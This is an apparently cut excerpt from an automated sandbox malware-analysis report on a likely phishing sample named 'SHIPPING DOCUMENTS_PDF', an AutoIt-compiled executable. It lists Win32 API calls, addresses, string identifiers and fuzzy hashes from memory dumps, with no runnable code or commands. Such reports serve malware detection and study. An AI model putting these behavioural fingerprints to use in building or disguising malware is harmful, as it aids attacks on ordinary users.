                                                                                    • Instruction Fuzzy Hash: B4129E70205201DFDB15EF24C894BA9BBE1FF05301F5445EAE99ACB662DB31EC45CBA1
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(00000000), ref: 00BC74DE
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00BC759D
                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00BC75DB
                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00BC75ED
                                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00BC7633
                                                                                    • GetClientRect.USER32(00000000,?), ref: 00BC763F
                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00BC7683
                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00BC7692
                                                                                    • GetStockObject.GDI32(00000011), ref: 00BC76A2
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00BC76A6
                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00BC76B6
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BC76BF
                                                                                    • DeleteDC.GDI32(00000000), ref: 00BC76C8
                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00BC76F4
                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00BC770B
                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00BC7746
                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00BC775A
                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00BC776B
                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00BC779B
                                                                                    • GetStockObject.GDI32(00000011), ref: 00BC77A6
                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00BC77B1
                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00BC77BB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                    • API String ID: 2910397461-517079104
                                                                                    • Opcode ID: 95b1f0f0ac429dfdc6f81091d99e6cfb77b2263c70085e2134ae19c27e91e40f
                                                                                    • Instruction ID: b55ae31a7babccc080d319ea2e52a01bc9d1a43ed451d0f42953288dbbddf48e
                                                                                    • Opcode Fuzzy Hash: 95b1f0f0ac429dfdc6f81091d99e6cfb77b2263c70085e2134ae19c27e91e40f
                                                                                    • Instruction Fuzzy Hash: 44A17EB1A40615FFEB14DBA4DC4AFAEBBB9EB45710F048155FA15A72E0DB70AD00CB60
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00BBAD1E
                                                                                    • GetDriveTypeW.KERNEL32(?,00BDFAC0,?,\\.\,00BDF910), ref: 00BBADFB
                                                                                    • SetErrorMode.KERNEL32(00000000,00BDFAC0,?,\\.\,00BDF910), ref: 00BBAF59
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$DriveType
                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                    • API String ID: 2907320926-4222207086
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                    • API String ID: 1038674560-86951937
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00BD9AD2
                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00BD9B8B
                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 00BD9BA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: 0
                                                                                    • API String ID: 2326795674-4108050209
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000012), ref: 00BDA903
                                                                                    • SetTextColor.GDI32(?,?), ref: 00BDA907
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00BDA91D
                                                                                    • GetSysColor.USER32(0000000F), ref: 00BDA928
                                                                                    • CreateSolidBrush.GDI32(?), ref: 00BDA92D
                                                                                    • GetSysColor.USER32(00000011), ref: 00BDA945
                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BDA953
                                                                                    • SelectObject.GDI32(?,00000000), ref: 00BDA964
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00BDA96D
                                                                                    • SelectObject.GDI32(?,?), ref: 00BDA97A
                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00BDA999
                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BDA9B0
                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00BDA9C5
                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00BDA9ED
                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00BDAA14
                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00BDAA32
                                                                                    • DrawFocusRect.USER32(?,?), ref: 00BDAA3D
                                                                                    • GetSysColor.USER32(00000011), ref: 00BDAA4B
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00BDAA53
                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00BDAA67
                                                                                    • SelectObject.GDI32(?,00BDA5FA), ref: 00BDAA7E
                                                                                    • DeleteObject.GDI32(?), ref: 00BDAA89
                                                                                    • SelectObject.GDI32(?,?), ref: 00BDAA8F
                                                                                    • DeleteObject.GDI32(?), ref: 00BDAA94
                                                                                    • SetTextColor.GDI32(?,?), ref: 00BDAA9A
                                                                                    • SetBkColor.GDI32(?,?), ref: 00BDAAA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 1996641542-0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BD8AC1
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD8AD2
                                                                                    • CharNextW.USER32(0000014E), ref: 00BD8B01
                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BD8B42
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BD8B58
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD8B69
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00BD8B86
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00BD8BD8
                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00BD8BEE
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BD8C1F
                                                                                    • _memset.LIBCMT ref: 00BD8C44
                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00BD8C8D
                                                                                    • _memset.LIBCMT ref: 00BD8CEC
                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00BD8D16
                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00BD8D6E
                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00BD8E1B
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00BD8E3D
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BD8E87
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00BD8EB4
                                                                                    • DrawMenuBar.USER32(?), ref: 00BD8EC3
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 00BD8EEB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                    • String ID: 0
                                                                                    • API String ID: 1073566785-4108050209
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 00BD49CA
                                                                                    • GetDesktopWindow.USER32 ref: 00BD49DF
                                                                                    • GetWindowRect.USER32(00000000), ref: 00BD49E6
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00BD4A48
                                                                                    • DestroyWindow.USER32(?), ref: 00BD4A74
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00BD4A9D
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00BD4ABB
                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00BD4AE1
                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00BD4AF6
                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00BD4B09
                                                                                    • IsWindowVisible.USER32(?), ref: 00BD4B29
                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00BD4B44
                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00BD4B58
                                                                                    • GetWindowRect.USER32(?,?), ref: 00BD4B70
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00BD4B96
                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00BD4BB0
                                                                                    • CopyRect.USER32(?,?), ref: 00BD4BC7
                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00BD4C32
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                    • String ID: ($0$tooltips_class32
                                                                                    • API String ID: 698492251-4156429822
                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00BB44AC
                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00BB44D2
                                                                                    • _wcscpy.LIBCMT ref: 00BB4500
                                                                                    • _wcscmp.LIBCMT ref: 00BB450B
                                                                                    • _wcscat.LIBCMT ref: 00BB4521
                                                                                    • _wcsstr.LIBCMT ref: 00BB452C
                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00BB4548
                                                                                    • _wcscat.LIBCMT ref: 00BB4591
                                                                                    • _wcscat.LIBCMT ref: 00BB4598
                                                                                    • _wcsncpy.LIBCMT ref: 00BB45C3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                    • API String ID: 699586101-1459072770
                                                                                    APIs
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B528BC
                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00B528C4
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B528EF
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00B528F7
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00B5291C
                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B52939
                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B52949
                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B5297C
                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B52990
                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00B529AE
                                                                                    • GetStockObject.GDI32(00000011), ref: 00B529CA
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B529D5
                                                                                      • Part of subcall function 00B52344: GetCursorPos.USER32(?), ref: 00B52357
                                                                                      • Part of subcall function 00B52344: ScreenToClient.USER32(00C157B0,?), ref: 00B52374
                                                                                      • Part of subcall function 00B52344: GetAsyncKeyState.USER32(00000001), ref: 00B52399
                                                                                      • Part of subcall function 00B52344: GetAsyncKeyState.USER32(00000002), ref: 00B523A7
                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00B51256), ref: 00B529FC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                    • String ID: AutoIt v3 GUI
                                                                                    • API String ID: 1458621304-248962490
                                                                                    • Opcode ID: d464a7d33a80c7978e682b2e881be16627dada6a2f3c46a33f6e9b976b34dff0
                                                                                    • Instruction ID: 807b9f7c9a2338729aa9c130df3b4d45543dba7fc3d0a42d4a1f8e909117c6d3
                                                                                    • Opcode Fuzzy Hash: d464a7d33a80c7978e682b2e881be16627dada6a2f3c46a33f6e9b976b34dff0
                                                                                    • Instruction Fuzzy Hash: 63B16C71A0120ADFDB14EFA8DC95BED7BF4FB49311F1081A9FA16A72A0DB749841CB50
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00BD3E6F
                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00BD3F2F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                    • API String ID: 3974292440-719923060
                                                                                    • Opcode ID: 9826559f9e0aa058eea24698fbff1afc2cb44c56db477c01d60d5c04504be929
                                                                                    • Instruction ID: 195282bdae794f611ed6319e4b90d169bfe658ac5dee7c53d0bf444266478498
                                                                                    • Opcode Fuzzy Hash: 9826559f9e0aa058eea24698fbff1afc2cb44c56db477c01d60d5c04504be929
                                                                                    • Instruction Fuzzy Hash: 08A17C706143019FCB14EF20C892B6AB7E5EF55714F1488EAB8669B3D2EB30ED09CB51
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00BAA47A
                                                                                    • __swprintf.LIBCMT ref: 00BAA51B
                                                                                    • _wcscmp.LIBCMT ref: 00BAA52E
                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00BAA583
                                                                                    • _wcscmp.LIBCMT ref: 00BAA5BF
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00BAA5F6
                                                                                    • GetDlgCtrlID.USER32(?), ref: 00BAA648
                                                                                    • GetWindowRect.USER32(?,?), ref: 00BAA67E
                                                                                    • GetParent.USER32(?), ref: 00BAA69C
                                                                                    • ScreenToClient.USER32(00000000), ref: 00BAA6A3
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00BAA71D
                                                                                    • _wcscmp.LIBCMT ref: 00BAA731
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00BAA757
                                                                                    • _wcscmp.LIBCMT ref: 00BAA76B
                                                                                      • Part of subcall function 00B7362C: _iswctype.LIBCMT ref: 00B73634
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                    • String ID: %s%u
                                                                                    • API String ID: 3744389584-679674701
                                                                                    • Opcode ID: e96ad5c969725ef6fd3f0235059abd23257ad7c59668cb32cc68c90cda0fd35d
                                                                                    • Instruction ID: 801f85abfc449bc1c3fe46684ff50a5597f6806648d01d98cd35a45f72c1b10a
                                                                                    • Opcode Fuzzy Hash: e96ad5c969725ef6fd3f0235059abd23257ad7c59668cb32cc68c90cda0fd35d
                                                                                    • Instruction Fuzzy Hash: 36A1B171208706AFDB15DF64C884BAAF7E8FF45314F00856AF999D2190DB30ED55CBA2
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00BAAF18
                                                                                    • _wcscmp.LIBCMT ref: 00BAAF29
                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00BAAF51
                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00BAAF6E
                                                                                    • _wcscmp.LIBCMT ref: 00BAAF8C
                                                                                    • _wcsstr.LIBCMT ref: 00BAAF9D
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00BAAFD5
                                                                                    • _wcscmp.LIBCMT ref: 00BAAFE5
                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00BAB00C
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00BAB055
                                                                                    • _wcscmp.LIBCMT ref: 00BAB065
                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00BAB08D
                                                                                    • GetWindowRect.USER32(00000004,?), ref: 00BAB0F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                    • String ID: @$ThumbnailClass
                                                                                    • API String ID: 1788623398-1539354611
                                                                                    • Opcode ID: a737ca5bf20c7f5b1e8c2ec8e03d5876b7f4d64a9a4f46bc0f8f98855a738ff7
                                                                                    • Instruction ID: 9dccfa126dd549d34dd74e0bbb285fa6f413af5d459801c5fd2202a8b33528f3
                                                                                    • Opcode Fuzzy Hash: a737ca5bf20c7f5b1e8c2ec8e03d5876b7f4d64a9a4f46bc0f8f98855a738ff7
                                                                                    • Instruction Fuzzy Hash: CD81B07110C2069FDB15DF10C881FAABBE8EF45714F0484EAFD999A092EB34DD89CB61
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
